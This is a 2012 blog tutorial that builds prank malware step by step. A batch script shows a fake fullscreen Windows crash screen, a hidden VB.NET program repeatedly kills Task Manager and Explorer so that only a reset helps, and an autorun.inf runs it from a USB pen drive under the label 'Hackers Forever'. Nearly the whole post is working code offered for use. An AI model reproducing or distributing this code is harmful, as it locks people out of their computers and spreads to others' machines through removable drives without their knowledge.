Thursday, July 26, 2012

Blue Screen Of Death

#1. First Open Notepad

Start -> All Programs -> Accessories -> Notepad.

#2. Now Put Following Code Into Open Notepad

@echo off
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
echo. >> bsod.hta
echo ^<hta:application id="oBVC" >> bsod.hta
echo applicationname="BSOD"  >> bsod.hta
echo version="1.0" >> bsod.hta
echo maximizebutton="no" >> bsod.hta
echo minimizebutton="no" >> bsod.hta
echo sysmenu="no" >> bsod.hta
echo Caption="no" >> bsod.hta
echo windowstate="maximize"/^> >> bsod.hta
echo. >> bsod.hta
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Technical information:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^<p^>***       gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" /wait "bsod.hta"
del /s /f /q "bsod.hta" > nul

#3. Save This File as BSOD.bat

#4. Start any one of them you are using
Visual Studio 2005 Express Edition / Visual Studio 2005 / Visual Studio 2008 Express Edition /Visual Studio 2008 / Visual Studio 2010 Express Edition /Visual Studio 2010

#5. Click On File -> New -> Project

#6. You Can See Following Screen: [I am using visual studio 2005]


#7. In Name Text Box Type : Blue_Screen_Of_Death And Click On OK

#8. From Toolbox Items Select Timer Control

#9. Now Double Click On Form1
    
#10. In Form1_Load Event Put Following Code Which look like this:


Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Timer1.Start()
        Me.Visible = False
        Me.ShowInTaskbar = False
        Process.Start(System.Environment.CurrentDirectory & "\BSOD.bat")
End Sub

#11. Now Go Back To Form1 Design View

#12. Double Click On Timer1

#13. In Timer1_Tick Event Put Following Code Which look like this:
 
Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        For Each selProcess As Process In Process.GetProcesses
            If selProcess.ProcessName = "taskmgr" Then
                selProcess.Kill()
                Exit For
            End If
        Next
        For Each taskprocess As Process In Process.GetProcesses
            If taskprocess.ProcessName = "explorer" Then
                taskprocess.Kill()
                Exit For
            End If
        Next
    End Sub

#14. Now Copy And Paste BSOD.bat File Into Your Program Directory.
Which May Look Like This:  C:\Documents and Settings\<Your User Name>\My Documents\Visual Studio 2005\Projects\Blue_Screen_Of_Death\Blue_Screen_Of_Death\bin\Debug

#15. Run Program By Pressing CTRL + F5.

#16. You Can See Blue Screen Of Death Which Appears Mostly When Computer Hardware Or Software Get Crash

#17. Reset Your Computer

#18. When Computer Gets Up Go To Directory:-> 
C:\Documents and Settings\<Your User Name>\My Documents\Visual Studio 2005\Projects\Blue_Screen_Of_Death\Blue_Screen_Of_Death\bin\Debug

#19. You Can See There are 2 Files Names are:
a) Blue_Screen_Of_Death.exe
b) BSOD.bat
Copy Both Files Into One Folder
For Example: Go To Desktop and Create New Folder And Put Those Files Into That Folder

#20. Now Open Notepad And Put Following Text [For icon you can set any icon to it like
] :

[autorun]
icon=BSOD.ico
label=Hackers Forever
open=Blue_Screen_Of_Death.exe
 
 #21. Save This File As autorun.inf Into New Folder Which We Created

 #22. Now Copy and Paste Your Icon Into Same Folder Which We Just Created

#23. In New Folder There are 4 File Are Namely:
a) Blue_Screen_Of_Death.exe
b) BSOD.bat
c) BSOD.ico - Your Icon
d) autorun.inf

#24. Copy All Files Into Your Pen Drive And See What Happens 

#25. This Screen Appears Like This [Warning: Task Manager And Explorer Get Kill Automatically Because Of That You Can Only Reset Or Restart Your Computer]:

  
* [Warning: This May Cause You Lose Your Pen Drive. So Do At Your Own Risk]

 

No comments:

Post a Comment